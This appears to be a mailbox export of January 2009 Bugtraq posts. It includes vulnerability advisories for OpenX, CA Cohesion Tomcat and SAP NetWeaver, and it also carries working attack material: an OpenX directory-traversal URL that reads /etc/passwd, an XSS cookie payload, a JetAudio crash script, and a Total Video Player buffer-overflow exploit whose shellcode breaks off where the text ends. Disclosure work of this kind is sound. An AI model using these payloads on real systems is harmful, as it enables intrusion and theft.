X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39303-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id ADAC4ED87E
for <lists@securityspace.com>; Tue, 27 Jan 2009 11:00:34 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id DD172237832; Tue, 27 Jan 2009 08:19:06 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 2500 invoked from network); 27 Jan 2009 14:54:47 -0000
Date: Tue, 27 Jan 2009 16:13:19 +0100
Message-Id: <200901271513.n0RFDJC8028322@ca.secunia.com>
To: bugtraq@securityfocus.com
Subject: Secunia Research: OpenX Multiple Vulnerabilities
From: Secunia Research <remove-vuln@secunia.com>
Status:   

=====================================================================
                     Secunia Research 27/01/2009

                 - OpenX Multiple Vulnerabilities -

=====================================================================Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

=====================================================================1) Affected Software 

* OpenX 2.6.3

NOTE: Other versions may also be affected.

=====================================================================2) Severity 

Rating: Moderately critical
Impact: SQL Injection
        Local File Inclusion
        Cross-Site Scripting
        Cross-Site Request Forgery
Where:  Remote

=====================================================================3) Vendor's Description of Software 

"OpenX is a popular free ad server used to manage the advertising on 
over 100,000 websites in more than 100 countries around the world. Use
OpenX to take control of the advertising on your sites".

Product Link:
http://www.openx.org/

=====================================================================4) Description of Vulnerabilities

Multiple vulnerabilities have been discovered in OpenX, which can be
exploited by malicious people to conduct cross-site scripting, 
cross-site request forgery, and file inclusion attacks and by 
malicious users to conduct script insertion and SQL injection attacks.

1) Input passed to the "clientid" parameter in "www/admin/banner-
acl.php", "www/admin/banner-edit.php", "www/admin/campaign-zone.php", 
"www/admin/advertiser-campaigns.php", "www/admin/campaign-
banners.php", and "www/admin/banner-activate.php" is not properly 
sanitised before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in
the context of an affected site.

2) Input passed to the "orderdirection" and "listorder" parameters in
"www/admin/userlog-index.php" and "www/admin/stats.php" is not 
properly sanitised before being returned to the user. This can be 
exploited to execute arbitrary HTML and script code in a user's 
browser session in the context of an affected site.

3) Input passed to the "origPublisherId" parameter in 
"www/admin/userlog-index.php" is not properly sanitised before being
returned to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in the context of an 
affected site.

4) Input passed to "setPerPage", "day", "period_end", "period_start",
and "statsBreakdown" parameters in "www/admin/stats.php" is not 
properly sanitised before being returned to the user. This can be 
exploited to execute arbitrary HTML and script code in a user's 
browser session in the context of an affected site.

5) Input passed to the "campaignid" parameter in "www/admin/banner-
acl.php", "www/admin/banner-edit.php", "www/admin/banner-acl.php", 
"www/admin/campaign-zone.php", and "www/admin/campaign-banners.php" 
is not properly sanitised before being returned to the user. This can
be exploited to execute arbitrary HTML and script code in a user's 
browser session in the context of an affected site.

6) Input passed to the "bannerid" parameter in "www/admin/banner-
acl.php" is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a 
user's browser session in the context of an affected site.

7) Input passed to the "affiliateid" parameter in "www/admin/zone-
probability.php", "www/admin/zone-invocation.php", 
"www/admin/affiliate-zones.php", and "www/admin/zone-include.php" is
not properly sanitised before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's 
browser session in the context of an affected site.

8) Input passed to the "zoneid" parameter in "www/admin/zone-
probability.php", "www/admin/zone-invocation.php", and 
"www/admin/zone-include.php" is not properly sanitised before being 
returned to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in the context of an 
affected site.

9) Input passed to the "userid" parameter in "www/admin/admin-
user.php" is not properly sanitised before being returned to the 
user. This can be exploited to execute arbitrary HTML and script code
in a user's browser session in the context of an affected site.

10) Input passed to the "thirdpartytrack" parameter in 
"www/admin/admin-generate.php" is not properly sanitised before being
returned to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in the context of an 
affected site.

11) Input passed to the "agencyid" parameter in "www/admin/agency-
edit.php" is not properly sanitised before being returned to the 
user. This can be exploited to execute arbitrary HTML and script code
in a user's browser session in the context of an affected site.

12) Input passed to the "codetype" parameter in "www/admin/affiliate-
preview.php" is not properly sanitised before being returned to the 
user. This can be exploited to execute arbitrary HTML and script code
in a user's browser session in the context of an affected site.

13) The application allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the 
requests. This can be exploited to e.g. perform script insertion 
attacks via the "timezone" parameter in www/admin/account-
preferences-timezone.php by tricking the user into visiting a 
malicious web site.

14) Input passed to the "name" and "description" parameters in 
"www/admin/channel-edit.php" is not properly sanitised before being 
used. This can be exploited to insert arbitrary HTML and script code,
which is executed in a user's browser session in the context of an 
affected site when the malicious entry is viewed.

15) Input passed to the "campaignid" parameter in "www/admin/banner-
acl.php", "www/admin/campaign-edit.php", and "www/admin/banner-
edit.php" is not properly sanitised before being used in SQL queries.
This can be exploited to manipulate SQL queries by injecting 
arbitrary SQL code.

16) Input passed to the "bannerid" parameter in "www/admin/banner-
acl.php" is not properly sanitised before being used in SQL queries. 
This can be exploited to manipulate SQL queries by injecting 
arbitrary SQL code.

17) Input passed to the "listorder" parameter in "www/admin/userlog-
index.php" is not properly sanitised before being used in SQL 
queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.

18) Input passed to the "affiliateid" parameter in "www/admin/zone-
probability.php", "www/admin/channel-edit.php", "www/admin/zone-
invocation.php", and "www/admin/zone-include.php" is not properly 
sanitised before being used in SQL queries. This can be exploited to
manipulate SQL queries by injecting arbitrary SQL code.

19) Input passed to the "clientid" parameter in "www/admin/campaign-
banners.php" is not properly sanitised before being used in SQL 
queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.

20) Input passed to the "zoneid" parameter in "www/admin/zone-
delete.php" and "www/admin/zone-include.php" is not properly 
sanitised before being used in SQL queries. This can be exploited to
manipulate SQL queries by injecting arbitrary SQL code.

21) Input passed to the "channelid" parameter in "www/admin/channel-
acl.php" is not properly sanitised before being used in SQL queries. 
This can be exploited to manipulate SQL queries by injecting 
arbitrary SQL code.

22) Input passed to the "MAX_type" parameter in "www/delivery/fc.php"
and to the "lang" parameter in "www/admin/numberFormat.js.php" is not
properly verified before being used to include files. This can be 
exploited to include arbitrary files from local resources via 
directory traversal attacks.

=====================================================================5) Solution 

Use another product.

=====================================================================6) Time Table 

20/01/2009 - Vendor notified (requested security contact).
20/01/2009 - Vendor informs that request has been passed on to 
             engineering team.
26/01/2009 - Third party publicly reports some of the vulnerabilities.
27/01/2009 - Public disclosure.

=====================================================================7) Credits 

Discovered by Sarid Harper, Secunia.

=====================================================================8) References

The Common Vulnerabilities and Exposures (CVE) project has not yet
assigned CVE identifiers for the vulnerabilities.

=====================================================================9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

=====================================================================10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-4/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

=====================================================================
From - Tue Jan 27 11:18:38 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005d1b
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39304-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 4CB79ED8B0
for <lists@securityspace.com>; Tue, 27 Jan 2009 11:16:08 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id C1BE8237824; Tue, 27 Jan 2009 08:19:50 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 18038 invoked from network); 26 Jan 2009 23:54:45 -0000
Date: 27 Jan 2009 00:20:48 -0000
Message-ID: <20090127002048.10726.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: admin@elites0ft.com
To: bugtraq@securityfocus.com
Subject: OpenX 2.6.3 - Local File Inclusion
Status:   

I have found a local file inclusion exploit in OpenX 2.6.3, this is in the script "fc.php", located in /www/delivery/

Here is a snip of the code:
[snip]
include_once '../../init-delivery.php';
$MAX_PLUGINS_AD_PLUGIN_NAME = 'MAX_type';
if(!isset($_GET[$MAX_PLUGINS_AD_PLUGIN_NAME])) {
echo $MAX_PLUGINS_AD_PLUGIN_NAME . ' is not specified';
exit(1);
}
$tagName = $_GET[$MAX_PLUGINS_AD_PLUGIN_NAME];
$tagFileName = MAX_PATH . '/plugins/invocationTags/'.$tagName.'/'.$tagName.'.delivery.php';
if(!file_exists($tagFileName)) {
echo 'Invocation plugin delivery file "' . $tagFileName . '" doesn\'t exists';
exit(1);
}
include $tagFileName;
[/snip]

As you can see, it is checking whether the file you have inputted exists. This can be exploited like so:

http://host/path/to/openx/www/delivery/fc.php??MAX_type=../../../../../../../../../../../../../../etc/passwd%00

Enjoy.

-Charlie
[Elites0ft.com]

From - Tue Jan 27 11:38:38 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005d1c
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39305-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id ACDAEED71D
for <lists@securityspace.com>; Tue, 27 Jan 2009 11:28:45 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 5AF1323782C; Tue, 27 Jan 2009 08:20:07 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 18132 invoked from network); 27 Jan 2009 00:00:21 -0000
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: CA20090123-01: Cohesion Tomcat Multiple Vulnerabilities (Updated - v1.1)
Date: Mon, 26 Jan 2009 19:26:13 -0500
Message-ID: <649CDCB56C88AA458EFF2CBF494B6204063DC017@USILMS12.ca.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: CA20090123-01: Cohesion Tomcat Multiple Vulnerabilities (Updated - v1.1)
Thread-Index: AcmAFdxVsprf38X8QKypbIXwFzjSoA=From: "Williams, James K" <James.Williams@ca.com>
To: <bugtraq@securityfocus.com>
X-OriginalArrivalTime: 27 Jan 2009 00:26:23.0772 (UTC) FILETIME=[E2652DC0:01C98015]
Status:   

Title: CA20090123-01: Cohesion Tomcat Multiple Vulnerabilities


CA Advisory Reference: CA20090123-01


CA Advisory Date: 2009-01-23


Reported By: n/a


Impact: Refer to the CVE identifiers for details.


Summary: Multiple security risks exist in Apache Tomcat as 
included with CA Cohesion Application Configuration Manager. CA 
has issued an update to address the vulnerabilities. Refer to the 
References section for the full list of resolved issues by CVE 
identifier.


Mitigating Factors: None


Severity: CA has given these vulnerabilities a Medium risk rating.


Affected Products:
CA Cohesion Application Configuration Manager 4.5


Non-Affected Products
CA Cohesion Application Configuration Manager 4.5 SP1


Affected Platforms:
Windows


Status and Recommendation:
CA has issued the following update to address the vulnerabilities.

CA Cohesion Application Configuration Manager 4.5:

RO04648
https://support.ca.com/irj/portal/anonymous/redirArticles?reqPage=search
&searchID=RO04648


How to determine if you are affected:

1. Using Windows Explorer, locate the file "RELEASE-NOTES".
2. By default, the file is located in the 
   "C:\Program Files\CA\Cohesion\Server\server\" directory.
3. Open the file with a text editor.
4. If the version is less than 5.5.25, the installation is 
   vulnerable.


Workaround: None


References (URLs may wrap):
CA Support:
http://support.ca.com/
CA20090123-01: Security Notice for Cohesion Tomcat
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=1975
40
Solution Document Reference APARs:
RO04648
CA Security Response Blog posting:
CA20090123-01: Cohesion Tomcat Multiple Vulnerabilities
community.ca.com/blogs/casecurityresponseblog/archive/2009/01/23.aspx
Reported By: 
n/a
CVE References:
CVE-2005-2090
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2090
CVE-2005-3510
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3510
CVE-2006-3835
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3835
CVE-2006-7195
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7195
CVE-2006-7196
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7196
CVE-2007-0450
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0450
CVE-2007-1355
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1355
CVE-2007-1358
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1358
CVE-2007-1858
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1858
CVE-2007-2449
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2449
CVE-2007-2450
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2450
CVE-2007-3382
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3382
CVE-2007-3385 *
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3385
CVE-2007-3386
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3386
CVE-2008-0128
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0128
*Note: the issue was not completely fixed by Tomcat maintainers.
OSVDB References: Pending
http://osvdb.org/


Changelog for this advisory:
v1.0 - Initial Release
v1.1 - Updated Impact, Summary, Affected Products


Customers who require additional information should contact CA
Technical Support at http://support.ca.com.

For technical questions or comments related to this advisory, 
please send email to vuln AT ca DOT com.

If you discover a vulnerability in CA products, please report your 
findings to the CA Product Vulnerability Response Team.
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=1777
82


Regards,
Ken Williams, Director ; 0xE2941985
CA Product Vulnerability Response Team


CA, 1 CA Plaza, Islandia, NY 11749

Contact http://www.ca.com/us/contact/
Legal Notice http://www.ca.com/us/legal/
Privacy Policy http://www.ca.com/us/privacy/
Copyright (c) 2009 CA. All rights reserved.

From - Tue Jan 27 11:48:38 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005d1d
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39306-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id D4089ED740
for <lists@securityspace.com>; Tue, 27 Jan 2009 11:38:52 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 3F889237839; Tue, 27 Jan 2009 08:20:59 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 23833 invoked from network); 27 Jan 2009 05:55:28 -0000
Date: 27 Jan 2009 06:21:33 -0000
Message-ID: <20090127062133.12723.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: alphanix00@gmail.com
To: bugtraq@securityfocus.com
Subject: JetAudio Basic 7.0.3 BufferOverFlow PoC
Status:   

#!/usr/bin/python
#By ALpHaNiX
#NullArea.Net

# proofs of concept
#EAX FFFFFFFF
#ECX 41414141
#EDX 00000001
#EBX 7FFD3000
#ESP 04ECFD8C
#EBP 04ECFDBC
#ESI 041F8648
#EDI 41414141
#EIP 7711737D kernel32.7711737D
#ESI & EDI Overritten


print "[+] JetAudio Basic 7.0.3 BufferOverFlow PoC"
lol="alpix.m3u"
file=open(lol,'w')
file.write("\x41"*1065987)
file.close()
print "[+]",lol,"File created "

From - Tue Jan 27 11:58:38 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005d1e
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39307-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 514E2ED742
for <lists@securityspace.com>; Tue, 27 Jan 2009 11:49:24 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 1AC1D23783F; Tue, 27 Jan 2009 08:21:22 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 26124 invoked from network); 27 Jan 2009 08:30:17 -0000
Message-ID: <497ECC64.6000402@csnc.ch>
Date: Tue, 27 Jan 2009 09:57:08 +0100
From: Martin Suess <martin.suess@csnc.ch>
User-Agent: Thunderbird 2.0.0.19 (Windows/20081209)
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Subject: SAP NetWeaver XSS Vulnerability
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: amavisd-new at csnc.ch
Status:   

#############################################################
#
# COMPASS SECURITY ADVISORY
http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# Product:   NetWeaver/Web DynPro
# Vendor:    SAP (www.sap.com)
# CVD ID:    CVE-2008-3358
# Subject:   Cross-Site Scripting Vulnerability
# Risk:      High
# Effect:    Remotely exploitable
# Author:    Martin Suess <martin.suess@csnc.ch>
# Date:      January 27th 2009
#
#############################################################

Introduction:
-------------
The vulnerability found targets the SAP NetWeaver portal. It is
possible to execute JavaScript code in the browser of a valid user
when clicking on a specially crafted URL which can be sent to the
user by email.
This vulnerability can be used to steal the user's session cookie or
redirect him to a phishing website which shows the (faked) login
screen and gets his logon credentials as soon as he tries to log in
on the faked site.

Affected:
---------
- All tested versions that are vulnerable
SAP NetWeaver/Web DynPro
[for detailed Information, see SAP Notification 1235253]

Description:
------------
A specially crafted URL in SAP NetWeaver allows an attacker to
launch a Cross-Site Scripting attack. The resulting page contains
only the unfiltered value of the vulnerable parameter. It is possible
to create an URL which causes the resulting page to contain malicious
JavaScript code. A response to such a request could look like the
following example:

HTTP/1.1 200 OK
Date: Fri, 18 Jul 2008 13:13:30 GMT
Server: <server>
content-type: text/plain
Content-Length: 67
Keep-Alive: timeout, maxP0
Connection: Keep-Alive

<html><title>test</title><body onload="alert(document.cookie)">
</body></html>

The code only gets executed in Microsoft Internet Explorer (tested
with version 7.0.5730 only). In Firefox (tested with version 3.0
only) it did not get executed as the content-type header of the
server response is interpreted more strictly (text/plain).

SAP Information Policy:
-----------------------
The information is available to registered SAP clients only (SAP
Security Notes).

Patches:
--------
Apply the latest SAP security patches for Netweaver. For more detailed
patch information, see SAP notification number 1235253.

Timeline:
---------
Vendor Status: Patch released
Vendor Notified: July 21st 2008
Vendor Response: July 28th 2008
Patch available: October 2008
Advisory Release: January 27th 2009

References:
-----------
- SAP Notification 1235253 (problem and patches)

From - Tue Jan 27 11:58:38 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005d1f
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39308-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 45E02ED834
for <lists@securityspace.com>; Tue, 27 Jan 2009 11:58:36 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id BF8F3237841; Tue, 27 Jan 2009 08:21:52 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 1564 invoked from network); 27 Jan 2009 14:36:29 -0000
Date: 27 Jan 2009 15:02:39 -0000
Message-ID: <20090127150239.29410.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: maroc-anti-connexion@hotmail.com
To: bugtraq@securityfocus.com
Subject: Total video player 1.3.7 local buffer overflow universal exploit
Status:   

/*simo36.tvp-bof.c
Authour : SimO-s0fT
Home : www.exploiter-ma.com
greetz to : Allah , mr.5rab , Sup3r crystal , Hack Back , Al Alame , all arab4services.net and friends
bahjawi danger khod nasi7a 
 


EAX 0034F928 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ECX 00004141
EDX 00340608
EBX 41414141
ESP 0012BF44
EBP 0012C160
ESI 0034F920 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDI 41414141
EIP 7C92B3FB ntdll.7C92B3FB



*/


#include<stdio.h>
#include <stdlib.h>
#include <string.h>
#include<windows.h>

#define OFFSET 549
char twacha[]="\x23\x45\x58\x54\x4d\x33\x55\x0d\x0a\x23\x45\x58\x54\x49\x4e\x46"
"\x3a\x33\x3a\x35\x30\x2c\x2d\x4d\x6f\x68\x61\x6d\x65\x64\x20\x47"
"\x68\x61\x6e\x6e\x61\x6d\x20\x2d\x20\x44\x41\x4f\x55\x44\x49\x20"
"\x34\x45\x56\x45\x52\x0d\x0a\x44\x3a\x5c";

char scode1[]"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x46\x43\x36\x42\x50\x5a";

char scode2[]"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
"\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
"\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
"\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
"\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
"\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
"\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
"\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
"\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
"\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
"\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
